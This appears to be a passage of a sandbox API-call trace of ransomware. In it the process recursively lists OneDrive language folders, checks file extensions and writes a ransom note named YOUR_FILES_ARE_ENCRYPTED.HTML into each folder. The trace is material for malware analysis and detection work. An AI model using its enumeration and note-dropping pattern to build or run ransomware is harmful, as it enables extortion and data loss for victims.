[0113.389] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x676496c0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x676496c0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6836654c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.389] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.389] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.389] GetProcessHeap () returned 0x600000 [0113.389] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\be\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.392] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.393] CloseHandle (hObject=0x32c) returned 1 [0113.393] GetProcessHeap () returned 0x600000 [0113.393] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.393] GetProcessHeap () returned 0x600000 [0113.393] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.394] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68687798, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x68687798, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x68687798, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="bg", cAlternateFileName="")) returned 1 [0113.394] StrStrIW (lpFirst="bg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.398] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg") returned 78 [0113.398] GetProcessHeap () returned 0x600000 [0113.398] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0113.400] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg" [0113.400] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg\\*" [0113.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68687798, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x68687798, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6c2bae6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.400] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68687798, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x68687798, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6c2bae6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="..", cAlternateFileName="")) returned 1 [0113.400] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bae6f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6c2bae6f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6e062107, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.400] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.400] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.400] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.400] lstrlenW (lpString=".mui") returned 4 [0113.400] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.400] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bae6f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6c2bae6f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6e062107, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.403] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.403] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.403] GetProcessHeap () returned 0x600000 [0113.403] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bg\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\bg\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.411] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.412] CloseHandle (hObject=0x330) returned 1 [0113.412] GetProcessHeap () returned 0x600000 [0113.412] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.412] GetProcessHeap () returned 0x600000 [0113.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.414] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e3f5924, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6e3f5924, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6e3f5924, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="bn-bd", cAlternateFileName="")) returned 1 [0113.414] StrStrIW (lpFirst="bn-bd", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.414] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd") returned 81 [0113.414] GetProcessHeap () returned 0x600000 [0113.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.415] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd" [0113.415] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd\\*" [0113.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e3f5924, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6e3f5924, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6ec4dc4a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName=".", cAlternateFileName="")) returned 0x626878 [0113.416] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e3f5924, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6e3f5924, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6ec4dc4a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="..", cAlternateFileName="")) returned 1 [0113.416] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec4dc4a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ec4dc4a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6f91e779, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.416] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.416] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.416] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.416] lstrlenW (lpString=".mui") returned 4 [0113.416] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.416] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec4dc4a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ec4dc4a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6f91e779, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.416] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0113.416] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.416] GetProcessHeap () returned 0x600000 [0113.416] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-bd\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\bn-bd\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.417] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.418] CloseHandle (hObject=0x330) returned 1 [0113.418] GetProcessHeap () returned 0x600000 [0113.418] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.418] GetProcessHeap () returned 0x600000 [0113.418] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.419] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6fb80d93, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6fb80d93, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6fb80d93, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="bn-in", cAlternateFileName="")) returned 1 [0113.419] StrStrIW (lpFirst="bn-in", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.419] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in") returned 81 [0113.419] GetProcessHeap () returned 0x600000 [0113.419] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.420] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in" [0113.420] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in\\*" [0113.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6fb80d93, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6fb80d93, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x70b72988, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0113.420] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6fb80d93, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6fb80d93, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x70b72988, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="..", cAlternateFileName="")) returned 1 [0113.420] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b72988, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x70b72988, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x71e855e0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.420] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.420] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.420] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.420] lstrlenW (lpString=".mui") returned 4 [0113.420] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.420] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b72988, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x70b72988, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x71e855e0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.420] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0113.420] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.421] GetProcessHeap () returned 0x600000 [0113.421] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bn-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\bn-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.421] WriteFile (in: hFile=0x330, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.422] CloseHandle (hObject=0x330) returned 1 [0113.422] GetProcessHeap () returned 0x600000 [0113.422] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.422] GetProcessHeap () returned 0x600000 [0113.423] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.423] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72a24d87, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x72a24d87, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x72a24d87, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="bs-latn-ba", cAlternateFileName="BS-LAT~1")) returned 1 [0113.423] StrStrIW (lpFirst="bs-latn-ba", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.423] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba") returned 86 [0113.423] GetProcessHeap () returned 0x600000 [0113.423] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.423] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba" [0113.423] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba\\*" [0113.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72a24d87, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x72a24d87, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c9f0fd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0113.423] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72a24d87, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x72a24d87, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c9f0fd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="..", cAlternateFileName="")) returned 1 [0113.423] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73c9f0fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c9f0fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.423] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.424] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.424] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.424] lstrlenW (lpString=".mui") returned 4 [0113.424] PathFindExtensionW 